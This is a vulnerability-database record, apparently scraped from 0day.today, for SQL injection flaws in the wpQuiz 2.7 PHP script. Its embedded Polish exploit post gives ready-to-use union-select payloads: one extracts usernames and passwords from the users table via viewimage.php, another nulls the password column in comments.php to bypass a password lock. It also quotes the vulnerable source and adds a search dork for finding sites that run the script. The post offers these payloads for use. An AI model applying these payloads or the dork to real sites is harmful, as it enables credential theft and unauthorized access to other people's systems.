DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-2321", "type": "zdt", "bulletinFamily": "exploit", "title": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2007-11-27T00:00:00", "modified": "2007-11-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/2321", "reporter": "Kacper", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-05T17:13:34", "viewCount": 7, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/2321", "sourceData": "========================================================\r\nwpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities\r\n========================================================\r\n\r\n\r\n\r\n\r\nTytul: wpQuiz 2.7 Remote SQL Injection Vulnerability\r\n### http://wireplastik.com/projects.php\r\n\r\n\r\nAutor: Kacper\r\n\r\n\r\nBlad:\r\n\r\n\r\nviewimage.php?id=-1'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,concat(user,char(58),password),14,15+from+users+where+id=1/*\r\n\r\nPozniej sciagnij obrazek i sprawdz jego zrodlo!\r\n\r\n\r\n==========================================================================================================================\r\nKolejny blad dotyczy nieautoryzowanego dostepu do komentowania wynikow na quizie.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nSkopiowane prosto z => http://devilteam.eu/forum/topics92/bypass-za-pomoca-sql-wpquiz-vt4278.htm\r\n==========================================================================================================================\r\nElo, ostatnio natknolem sie na ciekawy skrypt Quizowy (WpQuiz) i znalazlem w nim pare ciekawych bledow. \r\n\r\nw skrypcie istnieje opcja pozwalajaca na blokowanie na haslo przez administratora komentowania wynikow w quizie. \r\n\r\nPlik comments.php zawiera zrodlo: \r\nKod:\r\n$no = $_GET['id']; \r\n$setcheck = mysql_fetch_array(mysql_query(\"SELECT * FROM sets WHERE id='\".$no.\"'\")); \r\nif( mysql_affected_rows() == 0 ){ \r\ngeterror(\"commentsinvalidset\"); \r\n} \r\nif( $setcheck['isopen'] == 0 ){ \r\ngeterror(\"commentsquestionsetclosed\"); \r\n} \r\nif($setcheck['password'] != \"\"){ \r\nif( !isset($_POST['password']) || ($_POST['password'] != $setcheck['password']) ){ \r\n?> \r\n<form name=\"pwCheck\" action=\"<?= $_SERVER['PHP_SELF'] ?>?id=<?=$no?>\" method=\"post\"> \r\n<div class=\"pagehead\"><span class=\"big\"><b><?=getlang(\"commentspasswordheader\",1)?></b></span></div> \r\n<b><?=getlang(\"commentspasswordrequest\",1)?></b><br /> \r\n<?=getlang(\"commentspassword\",1)?> <input type=\"password\" name=\"password\" /> \r\n<input type=\"submit\" value=\"<?=getlang(\"commentspasswordsubmit\",1)?>\" /> \r\n</form> \r\n<?php \r\nexit; \r\n} \r\n}\r\n\r\n\r\n\r\njak widac: \r\nKod:\r\nif($setcheck['password'] != \"\"){\r\n\r\n\r\n\r\nskrypt pobiera informacje z bazy danych na temat blokowania komentowania. Jesli ta opcja bedzie pusta czyli (null=0) to skrypt nie zawola o haslo. \r\n\r\nwiec wykonujemy zapytanie SQL dzieki linijce: \r\nKod:\r\n$no = $_GET['id']; \r\n$setcheck = mysql_fetch_array(mysql_query(\"SELECT * FROM sets WHERE id='\".$no.\"'\"));\r\n\r\n\r\n\r\nNasze zapytanie: \r\nKod:\r\ncomments.php?id=-9'+union+select+0,1,2,3,4,5,null,7,8,9,10,11,12,13/*\r\n\r\n\r\n\r\nmetoda prob i bledow doszedlem do tego ?e kolumna numer 6 odpowiada za haslo i dalem tam null'a \r\n\r\ntaki maly tutek mo?e sie przydac dla tych co chca cos omijac zablokowanego na haslo \r\n==========================================================================================================================\r\n\r\n//dork:\"Powered by wpQuiz\" \r\n\r\nPozdrawiam\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "_state": {"dependencies": 1647387859, "score": 1659766679}}

{}